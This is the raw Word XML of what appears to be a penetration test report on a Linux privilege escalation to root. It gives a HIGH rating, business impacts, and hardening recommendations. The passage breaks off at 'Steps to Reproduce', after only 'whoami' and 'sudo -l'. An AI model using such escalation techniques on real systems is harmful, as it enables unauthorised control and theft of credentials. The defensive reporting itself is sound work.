          <w:p w14:paraId="1D99E4FF" w14:textId="6C5291F6" w:rsidR="006D7270" w:rsidRPr="00825B37" w:rsidRDefault="00825B37" w:rsidP="00B53F67">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="_Application_Wide_SQL" w:history="1">
              <w:r w:rsidRPr="00825B37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>Vuln</w:t>
              </w:r>
              <w:r w:rsidRPr="00825B37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r w:rsidRPr="00825B37">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                </w:rPr>
                <w:t>01</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5490" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33F2C4B5" w14:textId="6D7CEC08" w:rsidR="006D7270" w:rsidRDefault="00B108CA" w:rsidP="00B53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Privilege Escalation to root access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2695" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EE0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="037124D5" w14:textId="6428150A" w:rsidR="006D7270" w:rsidRPr="00082A07" w:rsidRDefault="001F093C" w:rsidP="00B53F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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E942C03" w14:textId="77777777" w:rsidR="006D7270" w:rsidRDefault="006D7270" w:rsidP="006D7270">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F71B806" w14:textId="68AAAFFE" w:rsidR="006D7270" w:rsidRPr="006D7270" w:rsidRDefault="006D7270" w:rsidP="006D7270">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1531411F" w14:textId="272206F5" w:rsidR="00EF2751" w:rsidRDefault="00EF2751" w:rsidP="006D7270">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc188314209"/>
      <w:r w:rsidRPr="00EF2751">
        <w:lastRenderedPageBreak/>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:t>isk</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF2751">
        <w:t xml:space="preserve"> O</w:t>
      </w:r>
      <w:r>
        <w:t>verview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="14FBF54C" w14:textId="608AF1F0" w:rsidR="00EF2751" w:rsidRDefault="00927E92" w:rsidP="007635A8">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>The Below chart show</w:t>
      </w:r>
      <w:r w:rsidR="007635A8">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the Number of </w:t>
      </w:r>
      <w:r w:rsidR="007635A8">
        <w:t>vulnerabilities,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and their risks</w:t>
      </w:r>
      <w:r w:rsidR="007635A8">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007635A8" w:rsidRPr="007635A8">
        <w:t>categorized as Critical, High, Medium, Low, and Informative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8A36D" w14:textId="61535691" w:rsidR="00B266E8" w:rsidRPr="00EF2751" w:rsidRDefault="00B266E8" w:rsidP="00A63918">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="552CEAB7" wp14:editId="281DC3C0">
            <wp:extent cx="5486400" cy="3200400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1069227309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75214D96" w14:textId="76CCA767" w:rsidR="006D7270" w:rsidRDefault="006D7270">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2243AAA7" w14:textId="77777777" w:rsidR="006D7270" w:rsidRDefault="006D7270" w:rsidP="00B46D38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc186497246"/>
      <w:bookmarkStart w:id="13" w:name="_Toc188314210"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Potential Business Impact</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="18F67EC5" w14:textId="77777777" w:rsidR="006D7270" w:rsidRDefault="006D7270" w:rsidP="006D7270">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002412E9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The highlights of business impact possible due to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pentest</w:t>
      </w:r>
      <w:r w:rsidRPr="002412E9">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are listed below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095C936F" w14:textId="637864F4" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Full system compromise: An attacker with root access can fully control the host — read, modify, or delete any file and run arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F90CF15" w14:textId="5AF3E788" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exposure of secrets: Sensitive assets (SSH keys, /etc/shadow, database credentials, configuration files) can be stolen, enabling subsequent attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31653697" w14:textId="06271575" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Data integrity loss: Attackers can alter or corrupt application data, logs, or backups, undermining trust in system outputs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC1028" w14:textId="5019FFBB" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Service disruption: Critical services may be stopped, tampered with, or overwhelmed, causing downtime and business interruption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05348515" w14:textId="31424060" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Persistence &amp; stealth: The attacker can create hidden backdoors (new users, SUID binaries, cronjobs) that are hard to detect and remove.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE23318" w14:textId="3A9B0627" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lateral movement: Compromised host can be used as a pivot to breach internal networks or cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CF0FF6" w14:textId="6B70B0EA" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Regulatory &amp; legal exposure: Theft of personal or regulated data risks non-compliance (e.g., GDPR, PCI) and potential fines or legal action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA42DF4" w14:textId="198A2296" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reputational damage: A successful breach can erode customer and partner trust, impacting sales and brand value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0183BE77" w14:textId="79E2F4FF" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Operational cost: Incident response, forensic analysis, remediation, and credential rotation incur significant time and financial expense.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362E8005" w14:textId="3B3E41B8" w:rsidR="00B108CA" w:rsidRPr="001F093C" w:rsidRDefault="00B108CA" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Enabler for severe threats: With host-level access an attacker can deploy ransomware, exfiltrate intellectual property, or sabotage production at scale.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B978139" w14:textId="77777777" w:rsidR="00190C9C" w:rsidRDefault="00190C9C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:caps/>
          <w:color w:val="FF2323"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2355E6" w14:textId="6BC3D9E1" w:rsidR="00190C9C" w:rsidRDefault="00045245" w:rsidP="00190C9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc188314211"/>
      <w:r w:rsidRPr="00045245">
        <w:lastRenderedPageBreak/>
        <w:t>Technical Vulnerabilities Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="156D397C" w14:textId="1FBAD247" w:rsidR="00190C9C" w:rsidRPr="001F3E26" w:rsidRDefault="002D6565" w:rsidP="00190C9C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_VULNERABLE_AND_OUTDATED"/>
      <w:bookmarkStart w:id="16" w:name="_Application_Wide_SQL"/>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidRPr="001F3E26">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Below are the finding details with their respective exploitation scenarios in severity </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8EBABA" w14:textId="1CE9B514" w:rsidR="002D6565" w:rsidRDefault="002C1406" w:rsidP="00052B45">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>PRIVILEGE ESCALATION TO ROOT ACCESS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75"/>
        <w:gridCol w:w="6475"/>
      </w:tblGrid>
      <w:tr w:rsidR="00052B45" w14:paraId="001CEC42" w14:textId="77777777" w:rsidTr="002C14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shd w:val="clear" w:color="auto" w:fill="EE0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="088A7FF4" w14:textId="77777777" w:rsidR="00052B45" w:rsidRPr="003B4957" w:rsidRDefault="00052B45" w:rsidP="000E6C79">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003B4957">
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EE0000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="445B5D73" w14:textId="37D62BE7" w:rsidR="00052B45" w:rsidRPr="003B4957" w:rsidRDefault="002C1406" w:rsidP="000E6C79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HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00052B45" w14:paraId="2124180E" w14:textId="77777777" w:rsidTr="000E6C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shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="70A04D88" w14:textId="77777777" w:rsidR="00052B45" w:rsidRDefault="00052B45" w:rsidP="000E6C79">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50CB4508" w14:textId="35383F86" w:rsidR="00052B45" w:rsidRDefault="001F093C" w:rsidP="000E6C7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9" w:anchor="CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" w:history="1">
              <w:r w:rsidRPr="001F093C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CVSS 8.8</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00052B45" w14:paraId="30E438EC" w14:textId="77777777" w:rsidTr="000E6C79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shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="00BB83E4" w14:textId="77777777" w:rsidR="00052B45" w:rsidRDefault="00052B45" w:rsidP="000E6C79">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Affected Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="34BF7B26" w14:textId="3E7C8894" w:rsidR="00B46D38" w:rsidRDefault="001F093C" w:rsidP="000F2BAD">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28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User terminal </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00052B45" w14:paraId="7DCF9256" w14:textId="77777777" w:rsidTr="000E6C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shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E688C17" w14:textId="77777777" w:rsidR="00052B45" w:rsidRDefault="00052B45" w:rsidP="000E6C79">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rtl/>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:bidi="ar-EG"/>
              </w:rPr>
              <w:t>Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6475" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BD32216" w14:textId="5302CBDB" w:rsidR="00052B45" w:rsidRDefault="001F093C" w:rsidP="000E6C7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0" w:anchor=":~:text=Another%20common%20method%20of%20privilege,(RCE)%20with%20high%20privileges." w:history="1">
              <w:r w:rsidRPr="001F093C">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Linux privilege escalation</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4861908E" w14:textId="77777777" w:rsidR="00D44CE9" w:rsidRDefault="00D44CE9" w:rsidP="00D96740">
      <w:pPr>
        <w:pStyle w:val="TechnicalHeader"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5942FDD1" w14:textId="4F494179" w:rsidR="002D6565" w:rsidRDefault="0099121A" w:rsidP="00D96740">
      <w:pPr>
        <w:pStyle w:val="TechnicalHeader"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="0099121A">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1465292E" w14:textId="4397B6F4" w:rsidR="0099121A" w:rsidRDefault="001F093C" w:rsidP="001F4853">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As a regular user with limited permissions I can get the root shell and execute any command I cant execute before </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB64ED" w14:textId="338226ED" w:rsidR="0099121A" w:rsidRDefault="0099121A" w:rsidP="00CC07F7">
      <w:pPr>
        <w:pStyle w:val="TechnicalHeader"/>
      </w:pPr>
      <w:r w:rsidRPr="00CC07F7">
        <w:t>IMPACT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4883091B" w14:textId="77777777" w:rsidR="001F093C" w:rsidRPr="001F093C" w:rsidRDefault="001F093C" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Full system compromise: An attacker with root access can fully control the host — read, modify, or delete any file and run arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66011CC9" w14:textId="77777777" w:rsidR="001F093C" w:rsidRPr="001F093C" w:rsidRDefault="001F093C" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F093C">
        <w:rPr>
          <w:rFonts w:cs="Calibri"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exposure of secrets: Sensitive assets (SSH keys, /etc/shadow, database credentials, configuration files) can be stolen, enabling subsequent attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3BAB47" w14:textId="3C23A997" w:rsidR="001F093C" w:rsidRDefault="0099121A" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="TechnicalHeader"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>RECOMMENDATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6F443B" w14:textId="77777777" w:rsidR="001F093C" w:rsidRDefault="001F093C" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr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Apply least privilege:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ensure container or application users run with minimal permissions — avoid granting unnecessary write access to system directories like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>/etc/default</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999547E" w14:textId="77777777" w:rsidR="001F093C" w:rsidRDefault="001F093C" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr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Harden file permissions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Review and lock down permissions for sensitive configuration files and scripts to prevent unauthorized modifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4B2892" w14:textId="77777777" w:rsidR="001F093C" w:rsidRDefault="001F093C" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr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Disable SUID binaries where possible:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Remove or restrict execution of SUID binaries not required for normal operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40605370" w14:textId="77777777" w:rsidR="001F093C" w:rsidRDefault="001F093C" w:rsidP="001F093C">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr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Implement proper user separation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Prevent containers or service accounts from accessing host-level paths or sensitive environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378F2750" w14:textId="1CE4C3B9" w:rsidR="0099121A" w:rsidRDefault="0099121A" w:rsidP="00C4615A">
      <w:pPr>
        <w:pStyle w:val="TechnicalHeader"/>
      </w:pPr>
      <w:r w:rsidRPr="0099121A">
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EE1C27" w14:textId="0C741FFF" w:rsidR="001B2E61" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Information_Disclosure"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>see whoami on the system by this command 'whoami'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BADFA9C" w14:textId="5335898A" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47EA4F4B" wp14:editId="4D5BFAC0">
            <wp:extent cx="2476846" cy="552527"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7932705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270536" name="Picture 1" descr="A screen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EA5EB" w14:textId="0FBD142C" w:rsidR="00DC7124" w:rsidRPr="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7124">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>i tried to see my accessible commands but it returns nothing it just needs password by this command 'sudo -l'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C2825" w14:textId="2257CF57" w:rsidR="00DC7124" w:rsidRDefault="00DC7124" w:rsidP="00DC7124">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="24"/>
